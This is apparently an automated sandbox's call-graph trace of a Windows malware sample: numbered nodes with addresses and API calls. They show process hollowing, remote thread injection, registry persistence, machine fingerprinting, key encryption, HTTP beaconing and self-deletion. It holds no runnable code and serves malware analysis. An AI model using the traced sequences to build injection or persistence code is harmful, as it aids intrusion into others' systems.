lstrlenA 16534->16536 16535->16529 16535->16534 16537 24e1e27 16536->16537 16538 24e1d87 lstrcpyA OpenProcess 16536->16538 16537->16529 16538->16537 16539 24e1dbb EnumProcessModules 16538->16539 16540 24e1de5 GetModuleFileNameExA 16539->16540 16541 24e1e02 GetProcessImageFileNameA 16539->16541 16542 24e1e16 FindCloseChangeNotification 16540->16542 16541->16542 16542->16537 16544 24e9f5d 16543->16544 16545 24e9d37 16543->16545 16544->16300 16545->16544 16546 24e9d4b GetSystemDirectoryA 16545->16546 16546->16544 16547 24e9da8 GetVolumeInformationA 16546->16547 16547->16544 16548 24e9deb 16547->16548 16567 24e9f70 16548->16567 16552 24e9f0c WideCharToMultiByte lstrcpynA 16553 24e9f50 CoTaskMemFree 16552->16553 16553->16544 16555 24e579d lstrcpyA 16554->16555 16556 24e5ce7 lstrlenA 16554->16556 16555->16303 16556->16555 16557 24e5cfa CreateFileA 16556->16557 16557->16555 16558 24e5d23 GetFileSize 16557->16558 16559 24e5d9f FindCloseChangeNotification 16558->16559 16560 24e5d38 VirtualAlloc 16558->16560 16559->16555 16560->16559 16561 24e5d54 ReadFile 16560->16561 16562 24e5d8e VirtualFree 16561->16562 16563 24e5d7b 16561->16563 16562->16559 16563->16562 16565 24e92bd GetCurrentProcess 16564->16565 16566 24e9215 16564->16566 16565->16566 16566->16511 16566->16512 16568 24e9e2d StringFromCLSID 16567->16568 16569 24e9f87 16567->16569 16568->16552 16568->16553 16569->16568 16575 24e97a0 GetProcessHeap HeapAlloc 16569->16575 16571 24e9fb2 16571->16568 16572 24e9fc8 GetAdaptersInfo 16571->16572 16574 24e9ff4 16572->16574 16576 24e97c0 16574->16576 16575->16571 16577 24e97dc 16576->16577 16578 24e97c9 GetProcessHeap RtlFreeHeap 16576->16578 16577->16568 16578->16577 16580 24e59f3 16579->16580 16582 24e5949 16579->16582 16580->16318 16581 24e59de CharUpperA 16581->16582 16582->16580 16582->16581 16584 24e8ce7 16583->16584 16585 24e8bc7 16583->16585 16584->16330 16585->16584 16586 24e8be5 CryptAcquireContextA 16585->16586 16587 24e8c3e 16586->16587 16588 24e8c09 GetLastError 16586->16588 16587->16584 16589 24e8c48 CryptCreateHash 16587->16589 16590 24e8c1b 16588->16590 16591 24e8c24 CryptAcquireContextA 16588->16591 16592 24e8cdb CryptReleaseContext 16589->16592 16593 24e8c63 CryptHashData 16589->16593 16590->16587 16590->16591 16591->16587 16592->16584 16594 24e8c7b CryptGetHashParam 16593->16594 16595 24e8cd1 CryptDestroyHash 16593->16595 16594->16595 16596 24e8ca3 16594->16596 16595->16592 16596->16595 16597 24e8cab CryptGetHashParam 16596->16597 16597->16595 16598 24e8ccb 16597->16598 16598->16595 16600 24e9667 16599->16600 16601 24e9722 16599->16601 16600->16601 16602 24e9685 lstrlenA 16600->16602 16601->16330 16606 24e9699 16602->16606 16603 24e96fd lstrlenA 16604 24e970c 16603->16604 16605 24e9715 lstrlenA 16603->16605 16604->16605 16605->16601 16606->16603 16607 24e96d4 lstrcatA lstrlenA 16606->16607 16607->16606 16608->16356 16610 24e12fc 16609->16610 16611 24e12e6 16609->16611 16611->16610 16612 24e131d RegOpenKeyExA 16611->16612 16613 24e1378 Sleep 16612->16613 16614 24e1341 lstrlenA RegSetValueExA RegCloseKey 16612->16614 16613->16611 16614->16613 16616 24e5ef6 RegSetValueExA 16615->16616 16617 24e9bda 16615->16617 16616->16367 16617->16616 16618 24e9b90 QueryPerformanceCounter 16617->16618 16618->16617 16620 24e5f58 lstrcpyA lstrcatA 16619->16620 16620->16381 16620->16382 16622 24e79d2 16621->16622 16623 24ea417 16621->16623 16622->16424 16622->16426 16623->16622 16624 24ea442 RegOpenKeyExA 16623->16624 16624->16622 16625 24ea466 RegQueryValueExA 16624->16625 16626 24ea48a 16625->16626 16627 24ea490 RegCloseKey 16625->16627 16626->16627 16627->16622 16629 24e92fa 16628->16629 16630 24e93f8 16628->16630 16629->16630 16631 24e9304 GetLocalTime 16629->16631 16630->16440 16633 24e9322 16631->16633 16632 24e8bb0 9 API calls 16632->16633 16633->16630 16633->16632 16634 24e9650 5 API calls 16633->16634 16635 24e93c9 lstrcatA 16634->16635 16635->16633 16636->16458 16638 24e4b96 16637->16638 16639 24e4ad6 CoInitialize 16637->16639 16640 24e4ade 16639->16640 16641 24e4aeb WaitForSingleObject 16640->16641 16642 24e4b80 Sleep 16640->16642 16641->16642 16643 24e4b01 EnterCriticalSection 16641->16643 16642->16640 16703 24e8250 16643->16703 16646 24e4b50 16708 24e62b0 16646->16708 16649 24e4b90 CoUninitialize 16649->16638 16651 24e4bc2 16650->16651 16652 24e56f0 CoUninitialize 16650->16652 16653 24e4bd1 SetEvent 16651->16653 16654 24e4bf9 16653->16654 16654->16652 16655 24e4c28 VirtualAlloc VirtualAlloc VirtualAlloc 16654->16655 16656 24e4c10 WaitForSingleObject 16654->16656 16657 24e4c23 16655->16657 16658 24e4c8a 16655->16658 16656->16655 16656->16657 16657->16652 16658->16657 16660 24e4cc3 16658->16660 16662 24e52a2 16658->16662 16663 24e4ce5 16660->16663 16667 24e4e2c 16660->16667 16668 24e4db7 GetCurrentThreadId 16660->16668 16933 24e8370 16662->16933 16664 24e56b8 VirtualFree VirtualFree VirtualFree 16664->16657 16665 24e5354 lstrlenA lstrlenA 16665->16664 16666 24e5385 wsprintfA CryptBinaryToStringA 16665->16666 16666->16664 16669 24e53d0 MultiByteToWideChar 16666->16669 16667->16663 16671 24e4ee1 16667->16671 16672 24e4e81 GetSystemMetrics GetSystemMetrics 16667->16672 16668->16663 16952 24e17d0 16669->16952 16673 24e4f40 16671->16673 16674 24e4ef0 GlobalMemoryStatus 16671->16674 16672->16663 16673->16663 16680 24e4fdf lstrlenA 16673->16680 16681 24e5032 16673->16681 16674->16663 16675 24e569b 16675->16664 16676 24e56a4 VirtualFree 16675->16676 16676->16664 16678 24e551b 16678->16675 16682 24e552c EnterCriticalSection 16678->16682 16679 24e547d VirtualFree 16685 24e54b1 16679->16685 16680->16663 16683 24e5096 16681->16683 16684 24e5041 lstrlenA 16681->16684 16686 24e558c VirtualAlloc 16682->16686 16687 24e5542 VirtualAlloc 16682->16687 16688 24e5104 16683->16688 16689 24e50a5 lstrlenA 16683->16689 16684->16663 16685->16678 16695 24e17d0 16 API calls 16685->16695 16693 24e568e LeaveCriticalSection 16686->16693 16694 24e55c7 GetTickCount 16686->16694 16690 24e5578 16687->16690 16691 24e5172 16688->16691 16692 24e5113 lstrlenA 16688->16692 16689->16663 16690->16693 16696 24e51e0 16691->16696 16697 24e5181 lstrlenA 16691->16697 16692->16663 16693->16675 16701 24e55da 16694->16701 16695->16685 16698 24e523f 16696->16698 16699 24e51ef lstrlenA 16696->16699 16697->16663 16698->16663 16700 24e9b90 QueryPerformanceCounter 16698->16700 16699->16663 16700->16663 16702 24e565c VirtualFree 16701->16702 16702->16693 16704 24e4b37 LeaveCriticalSection 16703->16704 16707 24e8267 16703->16707 16704->16642 16704->16646 16705 24e82e7 StrStrA 16705->16704 16705->16707 16707->16704 16707->16705 16791 24e8090 16707->16791 16709 24e62ca 16708->16709 16720 24e4b5d VirtualFree SetEvent 16708->16720 16710 24e6427 16709->16710 16711 24e6399 16709->16711 16709->16720 16712 24e64ba GetEnvironmentVariableA 16710->16712 16718 24e65f3 16710->16718 16710->16720 16714 24e63a4 VirtualAlloc 16711->16714 16715 24e6410 16711->16715 16716 24e64e1 16712->16716 16713 24e6bdd 16713->16720 16887 24ea360 16713->16887 16719 24e640e 16714->16719 16728 24e63cc 16714->16728 16717 24e1ee0 2 API calls 16715->16717 16813 24e9730 16716->16813 16717->16719 16718->16713 16852 24e7250 16718->16852 16719->16710 16720->16649 16726 24e6552 WriteFile 16729 24e65dd 16726->16729 16730 24e6588 16726->16730 16727 24e63fd VirtualFree 16727->16719 16728->16727 16810 24e1ee0 CreateThread 16728->16810 16729->16718 16738 24e65e6 CloseHandle 16729->16738 16730->16729 16735 24e6593 CloseHandle 16730->16735 16731 24e6654 VirtualAlloc 16732 24e6752 16731->16732 16736 24e667a 16731->16736 16734 24e69ba GetEnvironmentVariableA 16732->16734 16739 24e678e VirtualAlloc 16732->16739 16740 24e6858 16732->16740 16742 24e69e1 16734->16742 16817 24e6c60 16735->16817 16864 24e97a0 GetProcessHeap HeapAlloc 16736->16864 16738->16718 16744 24e6856 16739->16744 16755 24e67c6 16739->16755 16743 24e2070 32 API calls 16740->16743 16747 24e9730 QueryPerformanceCounter 16742->16747 16743->16744 16749 24e69a6 16744->16749 16753 24e6894 16744->16753 16754 24e6880 16744->16754 16751 24e69f2 GetTickCount GetTempFileNameA CreateFileA 16747->16751 16749->16734 16759 24e6a4f 16751->16759 16790 24e6bbd 16751->16790 16752 24e6698 CreateThread CloseHandle 16752->16732 16761 24e698a 16753->16761 16875 24e97a0 GetProcessHeap HeapAlloc 16753->16875 16868 24e73c0 16754->16868 16756 24e6842 VirtualFree 16755->16756 16865 24e2070 16755->16865 16756->16744 16757 24e65d8 16764 24e6cf0 4 API calls 16757->16764 16758 24e65c9 16829 24e74a0 16758->16829 16765 24e6b1e WriteFile 16759->16765 16766 24e6a7b VirtualAlloc 16759->16766 16761->16749 16876 24e2510 16761->16876 16764->16729 16768 24e6b1c 16765->16768 16767 24e6aaf 16766->16767 16766->16768 16781 24e6b08 VirtualFree 16767->16781 16782 24e6ad2 WriteFile 16767->16782 16774 24e6bc9 CloseHandle 16768->16774 16777 24e6b59 CloseHandle 16768->16777 16774->16790 16775 24e68aa 16778 24e68ca 16775->16778 16779 24e68e9 VirtualAlloc 16775->16779 16776 24e6809 VirtualAlloc 16780 24e683f 16776->16780 16783 24e1e60 2 API calls 16777->16783 16778->16761 16785 24e693f CreateThread CloseHandle 16778->16785 16779->16778 16784 24e690f 16779->16784 16780->16756 16781->16768 16782->16781 16786 24e6b72 16783->16786 16784->16778 16785->16761 16915 24e77b0 16785->16915 16787 24e6b9e 16786->16787 16788 24e73c0 5 API calls 16786->16788 16786->16790 16789 24e2510 8 API calls 16787->16789 16787->16790 16788->16787 16789->16790 16790->16713 16792 24e8246 16791->16792 16793 24e80a7 16791->16793 16792->16707 16793->16792 16794 24e80c5 VirtualAlloc 16793->16794 16794->16792 16795 24e80eb 16794->16795 16803 24e1390 16795->16803 16797 24e8235 VirtualFree 16797->16792 16798 24e8100 16799 24e8a70 9 API calls 16798->16799 16802 24e8204 16798->16802 16800 24e81dd 16799->16800 16801 24e81e4 VirtualAlloc 16800->16801 16800->16802 16801->16802 16802->16792 16802->16797 16804 24e13ae 16803->16804 16805 24e139c 16803->16805 16804->16798 16805->16804 16806 24e13b6 GetProcessHeap RtlAllocateHeap 16805->16806 16806->16804 16808 24e13e4 16806->16808 16807 24e14e4 GetProcessHeap RtlFreeHeap 16807->16804 16808->16807 16809 24e1498 GetProcessHeap HeapFree 16808->16809 16809->16804 16811 24e1f0a WaitForSingleObject 16810->16811 16812 24e1f21 16810->16812 16811->16812 16812->16727 16814 24e64f2 GetTickCount GetTempFileNameA CreateFileA 16813->16814 16815 24e9743 16813->16815 16814->16718 16814->16726 16815->16814 16816 24e9763 QueryPerformanceCounter 16815->16816 16816->16815 16818 24e6c7c 16817->16818 16819 24e6c83 RegOpenKeyExA 16817->16819 16818->16819 16820 24e6ca7 16819->16820 16821 24e65ab 16819->16821 16822 24e9b90 QueryPerformanceCounter 16820->16822 16824 24e1e60 16821->16824 16823 24e6cae RegSetValueExA RegCloseKey 16822->16823 16823->16821 16825 24e1ece 16824->16825 16826 24e1e73 16824->16826 16825->16757 16825->16758 16827 24e1e90 CreateProcessA 16826->16827 16827->16825 16828 24e1ebe CloseHandle 16827->16828 16828->16825 16830 24e74bc 16829->16830 16831 24e74d2 Sleep 16830->16831 16832 24e750b 16831->16832 16833 24e74f5 GetModuleFileNameA 16831->16833 16835 24e7536 GetEnvironmentVariableA 16832->16835 16836 24e7520 GetAllUsersProfileDirectoryA 16832->16836 16834 24e7583 SetFileAttributesA wnsprintfA 16833->16834 16838 24e75c6 TerminateThread 16834->16838 16839 24e75d4 RegOpenKeyExA 16834->16839 16837 24e754d lstrcatA lstrcatA lstrcatA 16835->16837 16836->16837 16837->16834 16838->16839 16841 24e762a RegDeleteValueA RegCloseKey 16839->16841 16842 24e7649 16839->16842 16841->16842 16843 24e765e GetEnvironmentVariableA GetTickCount GetTempFileNameA lstrcatA CreateFileA 16842->16843 16844 24e5e30 6 API calls 16842->16844 16845 24e76df lstrlenA WriteFile CloseHandle 16843->16845 16846 24e65ce ExitProcess 16843->16846 16847 24e765b 16844->16847 16848 24e7731 16845->16848 16847->16843 16849 24e7744 CreateProcessA 16848->16849 16850 24e7796 CloseHandle 16849->16850 16851 24e77a3 ExitProcess 16849->16851 16850->16851 16853 24e6638 16852->16853 16854 24e7264 16852->16854 16853->16731 16853->16732 16854->16853 16855 24e72ad wsprintfA 16854->16855 16856 24e72df RegOpenKeyExA 16855->16856 16857 24e72d8 16855->16857 16856->16853 16858 24e7307 RegQueryValueExA 16856->16858 16857->16856 16859 24e73a5 RegCloseKey 16858->16859 16860 24e7333 16858->16860 16859->16853 16860->16859 16861 24e7339 GetLocalTime 16860->16861 16892 24e9910 SystemTimeToFileTime SystemTimeToFileTime 16861->16892 16863 24e7388 16863->16859 16864->16752 16894 24e20b0 16865->16894 16869 24e6891 16868->16869 16870 24e73d0 16868->16870 16869->16753 16870->16869 16871 24e7419 wsprintfA 16870->16871 16872 24e744b RegOpenKeyExA 16871->16872 16873 24e7444 16871->16873 16872->16869 16874 24e746f GetLocalTime RegSetValueExA RegCloseKey 16872->16874 16873->16872 16874->16869 16875->16775 16877 24e2527 16876->16877 16878 24e2573 16876->16878 16877->16878 16879 24e2531 VirtualAlloc 16877->16879 16878->16749 16879->16878 16880 24e257a VirtualAllocEx 16879->16880 16881 24e259f VirtualAllocEx 16880->16881 16883 24e25d7 16880->16883 16882 24e25bf VirtualFree 16881->16882 16881->16883 16882->16878 16884 24e2653 WriteProcessMemory 16883->16884 16885 24e2687 VirtualFree CreateRemoteThread 16884->16885 16886 24e2672 VirtualFree 16884->16886 16885->16878 16886->16878 16888 24ea3ed 16887->16888 16889 24ea370 16887->16889 16888->16720 16889->16888 16890 24ea39b RegOpenKeyExA 16889->16890 16890->16888 16891 24ea3bf RegSetValueExA RegCloseKey 16890->16891 16891->16888 16893 24e996b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16892->16893 16893->16863 16895 24e2080 16894->16895 16896 24e20c3 GetEnvironmentVariableA lstrcatA 16894->16896 16895->16756 16895->16776 16897 24e20f2 lstrcatA lstrcatA 16896->16897 16898 24e2115 16896->16898 16897->16898 16899 24e2138 VirtualAlloc 16898->16899 16899->16895 16900 24e219d CreateProcessA 16899->16900 16901 24e21ca VirtualFree 16900->16901 16902 24e21e2 VirtualAllocEx 16900->16902 16901->16895 16903 24e2213 VirtualAllocEx 16902->16903 16906 24e227d 16902->16906 16904 24e223c TerminateProcess CloseHandle CloseHandle VirtualFree 16903->16904 16903->16906 16904->16895 16905 24e237b WriteProcessMemory 16907 24e23a0 TerminateProcess CloseHandle CloseHandle VirtualFree 16905->16907 16908 24e23e1 VirtualFree GetThreadContext 16905->16908 16906->16905 16907->16895 16909 24e2444 WriteProcessMemory 16908->16909 16910 24e2414 TerminateProcess CloseHandle CloseHandle 16908->16910 16911 24e246a TerminateProcess CloseHandle CloseHandle 16909->16911 16912 24e2497 SetThreadContext 16909->16912 16910->16895 16911->16895 16913 24e24d9 TerminateProcess CloseHandle CloseHandle 16912->16913 16914 24e24c4 ResumeThread 16912->16914 16913->16895 16914->16895 16916 24e78c3 16915->16916 16917 24e77c0 CoInitialize 16915->16917 16918 24e78bd CoUninitialize 16917->16918 16919 24e77e8 16917->16919 16918->16916 16920 24e77fc GetExitCodeProcess 16919->16920 16921 24e7898 VirtualFree 16919->16921 16923 24e7818 16920->16923 16927 24e788f 16920->16927 16922 24e97c0 2 API calls 16921->16922 16924 24e78ba 16922->16924 16925 24e782e CloseHandle Sleep 16923->16925 16926 24e7821 Sleep 16923->16926 16924->16918 16928 24e2070 32 API calls 16925->16928 16926->16927 16927->16921 16929 24e7851 16928->16929 16929->16927 16930 24e7863 16929->16930 16931 24e2510 8 API calls 16929->16931 16930->16921 16932 24e788c 16931->16932 16932->16927 16934 24e8387 16933->16934 16935 24e5344 16933->16935 16934->16935 16936 24e83b1 VirtualAlloc VirtualAlloc 16934->16936 16935->16664 16935->16665 16937 24e83e9 16936->16937 16938 24e8592 16936->16938 16937->16938 16956 24e8800 16937->16956 16939 24e8598 VirtualFree 16938->16939 16940 24e85a9 16938->16940 16939->16940 16940->16935 16941 24e85af VirtualFree 16940->16941 16941->16935 16948 24e847e 16978 24e8970 16948->16978 16950 24e8581 VirtualFree 16950->16938 16951 24e84ad 16951->16950 16953 24e17e1 16952->16953 16955 24e181e 16952->16955 16953->16955 16989 24e1840 16953->16989 16955->16675 16955->16678 16955->16679 16957 24e8420 16956->16957 16958 24e8817 16956->16958 16957->16938 16972 24e8770 16957->16972 16958->16957 16959 24e8821 CryptAcquireContextA 16958->16959 16960 24e887a 16959->16960 16961 24e8845 GetLastError 16959->16961 16960->16957 16964 24e8884 CryptGenKey 16960->16964 16962 24e8857 16961->16962 16963 24e8860 CryptAcquireContextA 16961->16963 16962->16960 16962->16963 16963->16960 16965 24e88bd CryptExportKey 16964->16965 16966 24e8950 CryptReleaseContext 16964->16966 16967 24e88d9 16965->16967 16968 24e8946 CryptDestroyKey 16965->16968 16966->16957 16969 24e893d 16967->16969 16970 24e88f1 CryptImportKey 16967->16970 16968->16966 16969->16968 16970->16969 16971 24e8916 CryptExportKey CryptDestroyKey 16970->16971 16971->16969 16973 24e87d0 QueryPerformanceCounter 16972->16973 16974 24e844b 16973->16974 16975 24e87d0 16974->16975 16976 24e8458 VirtualAlloc 16975->16976 16977 24e87e3 QueryPerformanceCounter 16975->16977 16976->16938 16976->16948 16977->16976 16979 24e8a60 16978->16979 16980 24e8987 16978->16980 16979->16951 16980->16979 16981 24e89a5 CryptAcquireContextA 16980->16981 16982 24e89fe 16981->16982 16983 24e89c9 GetLastError 16981->16983 16982->16979 16986 24e8a04 CryptImportKey 16982->16986 16984 24e89db 16983->16984 16985 24e89e4 CryptAcquireContextA 16983->16985 16984->16982 16984->16985 16985->16982 16987 24e8a29 CryptEncrypt CryptDestroyKey 16986->16987 16988 24e8a54 CryptReleaseContext 16986->16988 16987->16988 16988->16979 16990 24e1c95 16989->16990 16991 24e185a 16989->16991 16990->16955 16991->16990 16992 24e18ba InternetCrackUrlA 16991->16992 16992->16990 16993 24e1910 InternetOpenA 16992->16993 16993->16990 16994 24e1936 InternetConnectA 16993->16994 16995 24e196f HttpOpenRequestA 16994->16995 16996 24e1c88 InternetCloseHandle 16994->16996 16997 24e19ad wnsprintfA HttpAddRequestHeadersA 16995->16997 16998 24e1c7b InternetCloseHandle 16995->16998 16996->16990 16999 24e1c6e InternetCloseHandle 16997->16999 17000 24e19eb InternetSetOptionA 16997->17000 16998->16996 16999->16998 17009 24e1a30 17000->17009 17002 24e1a4d HttpSendRequestA 17003 24e1a7b HttpQueryInfoA 17002->17003 17002->17009 17003->17009 17004 24e1adc HttpQueryInfoA 17005 24e1b47 VirtualAlloc 17004->17005 17004->17009 17006 24e1c19 17005->17006 17005->17009 17008 24e1c23 InternetReadFile 17006->17008 17007 24e1b99 InternetReadFile 17007->17009 17008->17008 17008->17009 17009->16999 17009->17002 17009->17004 17009->17005 17009->17007 17010 411249 17011 411250 17010->17011 17022 4102f0 17011->17022 17013 411261 17014 4102f0 106 API calls 17013->17014 17015 411279 17014->17015 17016 4102f0 106 API calls 17015->17016 17017 411230 17016->17017 17045 413a00 17017->17045 17023 410472 17022->17023 17024 410322 17022->17024 17027 414330 12 API calls 17023->17027 17025 410327 17024->17025 17026 41032c 17024->17026 17099 410280 17025->17099 17028 41048e 17026->17028 17030 410339 TlsGetValue 17026->17030 17027->17028 17031 414330 12 API calls 17028->17031 17032 410357 17030->17032 17033 41034d 17030->17033 17034 4104b4 17031->17034 17073 40fb00 17032->17073 17033->17013 17037 414330 12 API calls 17034->17037 17036 41035c 17036->17033 17038 41036b 6 API calls 17036->17038 17039 4104da 17037->17039 17040 4104e4 abort 17038->17040 17041 410426 GetThreadPriority 17038->17041 17042 410455 TlsSetValue 17039->17042 17043 414330 12 API calls 17040->17043 17041->17034 17041->17042 17042->17033 17042->17040 17044 41050f 17043->17044 17044->17013 17565 413480 17045->17565 17047 413a77 GetCurrentThreadId 17048 413a13 17047->17048 17052 411238 17047->17052 17048->17047 17049 413a39 ReleaseSemaphore 17048->17049 17051 413abe InterlockedDecrement 17048->17051 17048->17052 17049->17048 17050 413aa4 GetCurrentThreadId 17049->17050 17050->17048 17051->17048 17053 40f340 17052->17053 17054 40f34b 17053->17054 17055 40f3ac 17053->17055 17056 40f358 17054->17056 17057 414330 12 API calls 17054->17057 17058 414700 2 API calls 17056->17058 17057->17056 17059 40f360 17058->17059 17060 414330 12 API calls 17059->17060 17061 40f36d 17059->17061 17060->17061 17062 40f395 17061->17062 17063 40f44a fprintf 17061->17063 17064 40f39b 17062->17064 17579 4140e0 17062->17579 17063->17064 17066 414330 12 API calls 17064->17066 17069 40f3a4 17064->17069 17066->17069 17067 414660 Sleep 17067->17055 17069->17067 17071 414330 12 API calls 17072 40f3c5 free 17071->17072 17072->17064 17074 40fb11 17073->17074 17075 40fbe3 17073->17075 17113 413fd0 17074->17113 17077 414330 12 API calls 17075->17077 17077->17074 17079 40fc10 17083 414330 12 API calls 17079->17083 17080 40fb26 17081 40fb84 calloc 17080->17081 17082 40fb2c 17080->17082 17085 40fb9e 17081->17085 17098 40fb5a 17081->17098 17132 40f4d0 17082->17132 17084 40fc2c 17083->17084 17084->17036 17087 40f4d0 15 API calls 17085->17087 17091 40fba3 17087->17091 17088 40fb33 17095 414330 12 API calls 17088->17095 17096 40fb4a 17088->17096 17088->17098 17089 40fb6d 17090 413a00 19 API calls 17089->17090 17093 40fb75 17090->17093 17094 40fbad free 17091->17094 17091->17098 17092 414330 12 API calls 17092->17089 17093->17036 17094->17098 17095->17096 17097 414330 12 API calls 17096->17097 17096->17098 17097->17098 17098->17089 17098->17092 17531 40f1c0 17099->17531 17102 413fd0 105 API calls 17103 41029a 17102->17103 17104 4102e0 17103->17104 17105 4102a0 17103->17105 17555 40fca0 17104->17555 17107 4102c5 17105->17107 17108 4102a5 fprintf 17105->17108 17109 413a00 19 API calls 17107->17109 17108->17107 17110 4102cd 17109->17110 17111 40f340 20 API calls 17110->17111 17112 4102d4 17111->17112 17112->17026 17114 413f10 17113->17114 17176 413d20 17114->17176 17116 413f22 17117 40fb19 17116->17117 17118 413f78 17116->17118 17119 413fa0 GetCurrentThreadId 17116->17119 17120 413f38 17116->17120 17117->17079 17117->17080 17118->17120 17121 413f80 GetCurrentThreadId 17118->17121 17119->17120 17124 413fb4 17119->17124 17217 413770 17120->17217 17122 413f90 17121->17122 17124->17122 17125 413fbf InterlockedIncrement 17124->17125 17125->17122 17126 413f45 17235 416290 17126->17235 17129 413d20 19 API calls 17130 413f67 17129->17130 17130->17121 17131 413f6b 17130->17131 17131->17117 17133 40f4e1 17132->17133 17134 40f81a 17132->17134 17135 40f4ee 17133->17135 17136 40f85f 17133->17136 17134->17088 17138 40f87b 17135->17138 17139 40f4fd 17135->17139 17137 414330 12 API calls 17136->17137 17137->17138 17140 414330 12 API calls 17138->17140 17141 40f9d7 17139->17141 17142 40f824 malloc 17139->17142 17143 40f518 17139->17143 17171 40f553 17139->17171 17140->17171 17144 414330 12 API calls 17141->17144 17142->17134 17146 40f836 17142->17146 17145 40fa76 17143->17145 17148 40fa9c 17143->17148 17149 40f53b realloc 17143->17149 17147 40f9fd 17144->17147 17151 414330 12 API calls 17145->17151 17150 40fac2 17146->17150 17158 414330 12 API calls 17146->17158 17146->17171 17156 414330 12 API calls 17147->17156 17152 414330 12 API calls 17148->17152 17149->17134 17149->17171 17154 414330 12 API calls 17150->17154 17151->17148 17152->17150 17153 40f6eb 17153->17088 17154->17153 17155 40f7a7 17159 414330 12 API calls 17155->17159 17157 40fa23 17156->17157 17160 414330 12 API calls 17157->17160 17158->17171 17161 40f7c3 17159->17161 17164 40fa4e 17160->17164 17165 414330 12 API calls 17161->17165 17162 40ef80 12 API calls 17162->17171 17163 40f6c9 17163->17153 17167 414330 12 API calls 17163->17167 17168 414330 12 API calls 17164->17168 17166 40f791 17165->17166 17169 414330 12 API calls 17166->17169 17170 40f79d 17166->17170 17167->17153 17168->17145 17169->17170 17170->17088 17171->17147 17171->17153 17171->17155 17171->17157 17171->17161 17171->17162 17171->17163 17171->17164 17171->17166 17172 414330 12 API calls 17171->17172 17173 40f9bb 17171->17173 17175 40f736 memmove 17171->17175 17172->17171 17174 414330 12 API calls 17173->17174 17174->17141 17175->17171 17177 413e20 17176->17177 17178 413d34 17176->17178 17179 414330 12 API calls 17177->17179 17180 414700 2 API calls 17178->17180 17181 413e3c 17179->17181 17182 413d3c 17180->17182 17187 414330 12 API calls 17181->17187 17183 413de0 17182->17183 17185 413d4e 17182->17185 17183->17181 17184 413de9 17183->17184 17186 414660 Sleep 17184->17186 17188 413d56 17185->17188 17190 413ec0 17185->17190 17191 413d92 17185->17191 17189 413df1 17186->17189 17187->17184 17194 413e70 17188->17194 17195 413d75 17188->17195 17189->17116 17193 414330 12 API calls 17190->17193 17192 414660 Sleep 17191->17192 17196 413d9a 17192->17196 17197 413edc 17193->17197 17198 414330 12 API calls 17194->17198 17199 414660 Sleep 17195->17199 17261 413bd0 17196->17261 17206 414330 12 API calls 17197->17206 17201 413e8c 17198->17201 17202 413d7d 17199->17202 17201->17116 17202->17116 17203 413da1 17204 413db1 17203->17204 17205 413e98 17203->17205 17208 414700 2 API calls 17204->17208 17207 414330 12 API calls 17205->17207 17209 413f02 17206->17209 17210 413eb4 17207->17210 17211 413db9 17208->17211 17210->17190 17212 413dc1 17211->17212 17213 413e00 17211->17213 17212->17197 17214 413dce 17212->17214 17213->17188 17215 414660 Sleep 17214->17215 17216 413dd6 17215->17216 17216->17116 17218 413783 17217->17218 17219 4137f4 17217->17219 17220 414700 2 API calls 17218->17220 17221 414330 12 API calls 17219->17221 17222 41378b 17220->17222 17221->17218 17223 41381c fprintf exit 17222->17223 17225 41379e 17222->17225 17224 414330 12 API calls 17223->17224 17226 41387f 17224->17226 17227 4137c1 17225->17227 17228 4137b1 17225->17228 17226->17126 17230 414330 12 API calls 17227->17230 17229 414660 Sleep 17228->17229 17231 4137b9 17229->17231 17232 4137dd 17230->17232 17231->17126 17233 414660 Sleep 17232->17233 17234 4137ec 17233->17234 17234->17126 17236 4162a9 17235->17236 17251 416345 17235->17251 17285 411dd0 17236->17285 17241 4163f0 17241->17251 17254 4163f9 17241->17254 17242 4162c4 WaitForMultipleObjects 17243 4162f0 17242->17243 17244 4163cd ResetEvent 17242->17244 17249 41630c WaitForSingleObject 17243->17249 17243->17251 17259 413f5c 17243->17259 17245 4163e6 17244->17245 17246 41650e 17244->17246 17245->17242 17297 412210 17245->17297 17248 412210 103 API calls 17246->17248 17246->17259 17248->17259 17253 416330 17249->17253 17249->17259 17250 416551 17255 412070 103 API calls 17250->17255 17250->17259 17251->17246 17251->17250 17252 412070 103 API calls 17251->17252 17251->17259 17252->17251 17253->17259 17291 412070 17253->17291 17257 412070 103 API calls 17254->17257 17258 41643b 17254->17258 17254->17259 17255->17246 17257->17254 17258->17259 17260 412210 103 API calls 17258->17260 17259->17117 17259->17129 17260->17259 17262 413ca0 17261->17262 17263 413be5 17261->17263 17264 414330 12 API calls 17262->17264 17265 414700 2 API calls 17263->17265 17264->17263 17266 413bef 17265->17266 17267 413c24 17266->17267 17268 413c10 17266->17268 17271 413c83 17266->17271 17272 413c07 17266->17272 17269 413c4f 17267->17269 17270 413c30 17267->17270 17268->17267 17273 413af0 19 API calls 17268->17273 17275 414330 12 API calls 17269->17275 17274 414660 Sleep 17270->17274 17276 413c8c 17271->17276 17282 414330 12 API calls 17271->17282 17272->17268 17277 413cc8 17272->17277 17273->17267 17278 413c38 17274->17278 17279 413c6c 17275->17279 17281 413af0 19 API calls 17276->17281 17277->17276 17284 414330 12 API calls 17277->17284 17278->17203 17280 414660 Sleep 17279->17280 17283 413c7b 17280->17283 17281->17267 17282->17276 17283->17203 17284->17276 17286 4102f0 106 API calls 17285->17286 17287 411dd8 17286->17287 17288 411df0 17287->17288 17336 4107c0 17288->17336 17290 411dff 17290->17241 17290->17242 17292 4120b0 17291->17292 17293 41207c 17291->17293 17294 414330 12 API calls 17292->17294 17295 412082 17293->17295 17296 4102f0 106 API calls 17293->17296 17294->17293 17295->17259 17296->17295 17298 4102f0 102 API calls 17297->17298 17300 41221d 17298->17300 17299 412238 17299->17245 17300->17299 17301 412232 17300->17301 17302 414330 12 API calls 17300->17302 17301->17299 17303 413fd0 102 API calls 17301->17303 17302->17301 17304 41224b 17303->17304 17305 412262 17304->17305 17307 412294 17304->17307 17306 413a00 19 API calls 17305->17306 17308 41226a 17306->17308 17309 4122b4 17307->17309 17310 4122aa ResetEvent 17307->17310 17308->17245 17311 413a00 19 API calls 17309->17311 17310->17309 17312 4122bc 17311->17312 17369 412120 17312->17369 17337 410800 17336->17337 17338 4107cc 17336->17338 17337->17290 17339 414330 12 API calls 17338->17339 17341 4107d5 17338->17341 17339->17341 17340 413fd0 106 API calls 17342 4107dd 17340->17342 17341->17340 17349 40ef80 17342->17349 17344 4107e4 17345 4107f0 17344->17345 17347 414330 12 API calls 17344->17347 17346 413a00 19 API calls 17345->17346 17348 4107f8 17346->17348 17347->17345 17348->17290 17350 